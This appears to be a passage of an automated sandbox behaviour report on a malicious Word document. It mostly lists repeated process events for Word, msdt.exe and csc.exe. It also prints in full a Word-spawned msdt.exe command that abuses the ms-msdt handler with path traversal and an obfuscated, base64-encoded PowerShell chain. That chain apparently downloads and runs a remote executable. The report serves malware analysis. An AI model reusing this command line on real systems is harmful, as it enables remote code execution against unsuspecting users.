Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 1175 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4xgg4xy2\4xgg4xy2.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ebglgzvt\ebglgzvt.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2gwbg3vf\2gwbg3vf.dll Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe c:\windows\system32\msdt.exe" ms-msdt:/id pcwdiagnostic -skip force -param "it_rebrowseforfile=#7qnxe3 it_launchmethod=contextmenu it_browseforfile=aq$(iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'c1rvuc1wck9jrxnzic1mb3jdrsatbmfnrsanbxnkdcc7jesgpsbhrgqtdflwzsattuvtqmvszgvgau5jdglptianw0rsbeltcg9ydcgidvjsbw9olkrmbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigznftlhn0cmluzybelhn0cmluzybftyx1aw50ihvsleludfb0cib0ktsnic1uyw1ficj6iiatbkftrvnqywnfie0glvbhc3nuahj1oyakszo6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9ldmvudg9yz2fuaxplci5way9uzxdiaxrozxjlmjawntryzmrzlmv4zsisiirftly6qvbqrefuqvxbbnloyw1llmv4zsismcwwkttzdefsdc1tbevfccgzkttyvu5ebgwzmi5leeugemlwzmxkci5kbgwsum91dgvuagvdywxsicikzu5wokfquerbvefcqw55tmftzs5leguio1nut3atufjvq2vzuyatzk9yq0uglw5htuugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))y/../../../../../../../../../../../.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe c:\windows\system32\msdt.exe" ms-msdt:/id pcwdiagnostic -skip force -param "it_rebrowseforfile=#7qnxe3 it_launchmethod=contextmenu it_browseforfile=aq$(iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'c1rvuc1wck9jrxnzic1mb3jdrsatbmfnrsanbxnkdcc7jesgpsbhrgqtdflwzsattuvtqmvszgvgau5jdglptianw0rsbeltcg9ydcgidvjsbw9olkrmbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigznftlhn0cmluzybelhn0cmluzybftyx1aw50ihvsleludfb0cib0ktsnic1uyw1ficj6iiatbkftrvnqywnfie0glvbhc3nuahj1oyakszo6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9ldmvudg9yz2fuaxplci5way9uzxdiaxrozxjlmjawntryzmrzlmv4zsisiirftly6qvbqrefuqvxbbnloyw1llmv4zsismcwwkttzdefsdc1tbevfccgzkttyvu5ebgwzmi5leeugemlwzmxkci5kbgwsum91dgvuagvdywxsicikzu5wokfquerbvefcqw55tmftzs5leguio1nut3atufjvq2vzuyatzk9yq0uglw5htuugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))y/../../../../../../../../../../../.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6D8D.tmp" "c:\Users\user\AppData\Local\Temp\2gwbg3vf\CSCC73644C54160465D923214F243A883B6.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8088.tmp" "c:\Users\user\AppData\Local\Temp\4xgg4xy2\CSC5443C40DEFB3471C8BBC4E4A57C5FD37.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC60.tmp" "c:\Users\user\AppData\Local\Temp\ebglgzvt\CSC3DD4B19D6955475697366FD069454AC2.TMP" Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs